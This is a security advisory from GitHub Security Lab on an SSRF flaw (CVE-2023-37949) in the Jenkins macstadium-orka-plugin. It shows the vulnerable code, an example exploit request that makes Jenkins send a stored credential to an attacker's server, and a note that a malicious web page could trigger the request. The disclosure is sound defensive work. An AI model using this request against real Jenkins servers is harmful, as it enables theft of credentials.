skip to content
Back to
Home Bounties Research Advisories CodeQL Wall of Fame Get Involved Events
July 17, 2023

GHSL-2023-066: Server-Side Request Forgery (SSRF) in jenkinsci/macstadium-orka-plugin - CVE-2023-37949

Alvaro Munoz

Coordinated Disclosure Timeline


A Server-Side Request Forgery (SSRF) vulnerability in jenkinsci/macstadium-orka-plugin allows the leak of sensitive credentials to an attacker-controlled server. The issue arises from a lack of proper input validation/sanitization of the orkaEndpoint parameter in the OrkaAgent#doFillNodeItems. This method hardcodes an ACL.System access to the credentials storage and leak the secrets to attacker-controlled servers.


macstadium-orka-plugin Jenkins plugin

Tested Version



Arbitrary secret leakage via SSRF (GHSL-2023-066)

The OrkaAgent#doFillNodeItems method reads a credential identified by the orkaCredentialsId query parameter and sends it to the attacker-controlled server specified by the orkaEndpoint query parameter:

public ListBoxModel doFillNodeItems(@QueryParameter String orkaEndpoint,
        @QueryParameter String orkaCredentialsId, @QueryParameter boolean useJenkinsProxySettings,
        @QueryParameter boolean ignoreSSLErrors) {

    return this.infoHelper.doFillNodeItems(orkaEndpoint, orkaCredentialsId, useJenkinsProxySettings,

In order to exploit the vulnerability, the attacker needs to send a request to Jenkins specifying the secret to be read and the server to send it to. For example, to leak the FLAG credential to the authenticated attacker would need to send the following request:

POST /jenkins/descriptorByName/io.jenkins.plugins.orka.OrkaAgent/fillNodeItems?orkaEndpoint= HTTP/1.1
Host: localhost:8080
Connection: close
Content-Length: 0

Note that the attacker does NOT need to be authenticated but in that case, anonymous users need to have Overall/Read permission.

The code responsible to read the arbitrary credentials is:

public static <C extends Credentials> C lookupSystemCredentials(final String credentialsId, final Class<C> type) {
    return CredentialsMatchers.firstOrNull(
            CredentialsProvider.lookupCredentials(type, Jenkins.get(), ACL.SYSTEM, Collections.emptyList()),

As we can see in the code, regardless of the user privileges, the credentials are read with ACL.SYSTEM permissions.

Once the credentials are retrieved, they are sent back to the attacker-controlled server which will receive the following POST request:

POST /token HTTP/1.1
Content-Type: application/json; charset=utf-8
Content-Length: 44
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: okhttp/4.8.0


Since the POST request that initiates the SSRF is a simple request, an attacker could embed malicious JavaScript that submits this request on the user’s behalf when the victim visits the malicious page.

This vulnerability was found using CodeQL’s SSRF Java query.


This vulnerability can lead to sensitive secret credentials leak.




This issue was discovered and reported by GHSL team member @pwntester (Alvaro Muñoz).


You can contact the GHSL team at, please include a reference to GHSL-2023-066 in any communication regarding this issue.